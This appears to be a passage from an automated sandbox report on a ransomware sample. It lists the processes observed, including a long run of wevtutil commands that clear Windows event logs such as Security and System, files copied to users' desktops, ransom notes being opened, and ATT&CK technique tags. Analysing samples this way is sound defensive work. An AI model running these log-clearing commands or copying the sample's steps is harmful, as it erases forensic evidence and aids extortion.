- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
    3⤵
    PID:688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
    3⤵
    PID:1356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
    3⤵
    PID:660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
    3⤵
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
    3⤵
    PID:1524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
    3⤵
    PID:1528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
    3⤵
    PID:1796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
    3⤵
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
    3⤵
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Subsys-SMSS/Operational"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/Main"
    3⤵
    PID:736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
    3⤵
    PID:1824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-SystemHealthAgent/Diagnostic"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TCPIP/Diagnostic"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Debug"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msctf/Diagnostic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Debug"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TZUtil/Operational"
    3⤵
    PID:688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Debug"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Diagnostic"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Operational"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TaskbarCPL/Diagnostic"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Admin"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Analytic"
    3⤵
    PID:1356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Debug"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
    3⤵
    PID:660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Admin"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Analytic"
    3⤵
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Debug"
    3⤵
    PID:1524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-MediaRedirection/Analytic"
    3⤵
    PID:1528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Admin"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Analytic"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Debug"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
    3⤵
    PID:1796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
    3⤵
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Debug"
    3⤵
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Operational"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Playback"
    3⤵
    PID:736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Admin"
    3⤵
    PID:1824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Analytic"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Debug"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeCPL/Diagnostic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-TunnelDriver"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UAC-FileVirtualization/Operational"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UAC/Operational"
    3⤵
    PID:688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Debug"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Diagnostic"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIAutomationCore/Perf"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UIRibbon/Diagnostic"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-USB-USBHUB/Diagnostic"
    3⤵
    PID:1356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-USB-USBPORT/Diagnostic"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Control Panel Performance/Diagnostic"
    3⤵
    PID:660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Diagnostic"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User Profile Service/Operational"
    3⤵
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-User-Loader/Analytic"
    3⤵
    PID:1524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserModePowerService/Diagnostic"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceMetadata/Debug"
    3⤵
    PID:1528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/DeviceNotifications"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/Performance"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UserPnp/SchedulerOperations"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-UxTheme/Diagnostic"
    3⤵
    PID:1796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VAN/Diagnostic"
    3⤵
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VDRVROOT/Operational"
    3⤵
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VHDMP/Operational"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VWiFi/Diagnostic"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeControl/Performance"
    3⤵
    PID:736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-VolumeSnapshot-Driver/Operational"
    3⤵
    PID:1824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WABSyncProvider/Analytic"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WER-Diag/Operational"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Analytic"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-AutoConfig/Operational"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLAN-Autoconfig/Diagnostic"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
    3⤵
    PID:688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Debug"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Operational"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Trace"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCCore/Diagnostic"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPDMCUI/Diagnostic"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-PublicAPI/Diagnostic"
    3⤵
    PID:1356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Diagnostic"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WMPNSSUI/Diagnostic"
    3⤵
    PID:660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Analytic"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-ClassInstaller/Operational"
    3⤵
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Analytic"
    3⤵
    PID:1524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-CompositeClassDriver/Operational"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
    3⤵
    PID:1528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-MM-Events/Diagnostic"
    3⤵
    PID:1516
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
    3⤵
    PID:1796
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
    3⤵
    PID:1956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WWAN-UI-Events/Diagnostic"
    3⤵
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
    3⤵
    PID:240
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
    3⤵
    PID:736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
    3⤵
    PID:1824
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
    3⤵
    PID:1976
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
    3⤵
    PID:1552
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
    3⤵
    PID:1960
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
    3⤵
    PID:1968
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
    3⤵
    PID:1972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
    3⤵
    PID:688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
    3⤵
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
    3⤵
    PID:1468
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
    3⤵
    PID:1212
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Defender/Operational"
    3⤵
    PID:1656
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Defender/WHC"
    3⤵
    PID:1176
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
    3⤵
    PID:1356
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
    3⤵
    PID:660
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
    3⤵
    PID:2012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
    3⤵
    PID:1524
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
    3⤵
    PID:1528
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
    3⤵
    PID:1828
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
    3⤵
    PID:1564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
    3⤵
    PID:1400
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
    3⤵
    PID:1944
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
    3⤵
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
    3⤵
    PID:1644
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
    3⤵
    PID:1876
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
    3⤵
    PID:1820
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
    3⤵
    PID:600
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
    3⤵
    PID:1200
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
    3⤵
    PID:860
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
    3⤵
    PID:1408
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
    3⤵
    PID:564
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ntshrui"
    3⤵
    PID:1060
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
    3⤵
    PID:1840
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
    3⤵
    PID:624
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "OAlerts"
    3⤵
    PID:1040
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Security"
    3⤵
    PID:1688
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Setup"
    3⤵
    PID:328
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "System"
    3⤵
    PID:2032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "TabletPC_InputPanel_Channel"
    3⤵
    PID:1152
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
    3⤵
    PID:1880
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
    3⤵
    PID:972
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
    3⤵
    PID:1272
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WMPSetup"
    3⤵
    PID:908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "WMPSyncEngine"
    3⤵
    PID:1980
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Windows PowerShell"
    3⤵
    PID:952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "microsoft-windows-RemoteDesktopServices-RemoteDesktopSessionManager/Admin"
    3⤵
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "muxencode"
    3⤵
    PID:1996
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl
    3⤵
    PID:1112
- C:\Windows\system32\cmd.exe
  cmd /C "copy C:\Users\Public\Music\video.mp4 C:\Watch-me.mp4"
  2⤵
  PID:2024
- C:\Windows\system32\cmd.exe
  cmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Admin\Desktop\Watch-me.mp4"
  2⤵
  PID:432
- C:\Windows\system32\cmd.exe
  cmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Default\Desktop\Watch-me.mp4"
  2⤵
  PID:1564
- C:\Windows\system32\cmd.exe
  cmd /C "copy C:\Users\Public\Music\video.mp4 C:\Users\Public\Desktop\Watch-me.mp4"
  2⤵
  PID:288

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x570
1⤵
PID:908

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\Only_We_Can_Help_You.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1800

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Public\Desktop\Only_We_Can_Help_You.html
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:600
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:600 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  PID:864

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/864-594-0x0000000005FC0000-0x0000000005FE3000-memory.dmp

Filesize
140KB

Download
memory/928-75-0x0000000006030000-0x0000000006031000-memory.dmp

Filesize
4KB

Download
memory/928-63-0x0000000004950000-0x0000000004951000-memory.dmp

Filesize
4KB

Download
memory/928-65-0x0000000004860000-0x0000000004861000-memory.dmp

Filesize
4KB

Download
memory/928-62-0x00000000023B0000-0x00000000023B1000-memory.dmp

Filesize
4KB

Download
memory/928-61-0x0000000074850000-0x0000000074F3E000-memory.dmp

Filesize
6.9MB

Download
memory/928-64-0x0000000002600000-0x0000000002601000-memory.dmp

Filesize
4KB

Download
memory/1048-57-0x0000000006210000-0x0000000006211000-memory.dmp

Filesize
4KB

Download
memory/1048-50-0x0000000006160000-0x0000000006161000-memory.dmp

Filesize
4KB

Download
memory/1048-37-0x00000000748D0000-0x0000000074FBE000-memory.dmp

Filesize
6.9MB

Download
memory/1048-58-0x0000000006230000-0x0000000006231000-memory.dmp

Filesize
4KB

Download
memory/1048-38-0x0000000000BD0000-0x0000000000BD1000-memory.dmp

Filesize
4KB

Download
memory/1048-40-0x00000000025B0000-0x00000000025B1000-memory.dmp

Filesize
4KB

Download
memory/1048-49-0x0000000005FE0000-0x0000000005FE1000-memory.dmp

Filesize
4KB

Download
memory/1048-41-0x0000000005150000-0x0000000005151000-memory.dmp

Filesize
4KB

Download
memory/1048-39-0x0000000004830000-0x0000000004831000-memory.dmp

Filesize
4KB

Download
memory/1048-44-0x0000000005F60000-0x0000000005F61000-memory.dmp

Filesize
4KB

Download
memory/1296-1-0x0000000000400000-0x00000000006E5000-memory.dmp

Filesize
2.9MB

Download
memory/1296-2-0x0000000000400000-0x00000000006E5000-memory.dmp

Filesize
2.9MB

Download
memory/1296-0-0x0000000000400000-0x00000000006E5000-memory.dmp

Filesize
2.9MB

Download
memory/1548-588-0x000007FEF7090000-0x000007FEF730A000-memory.dmp

Filesize
2.5MB

Download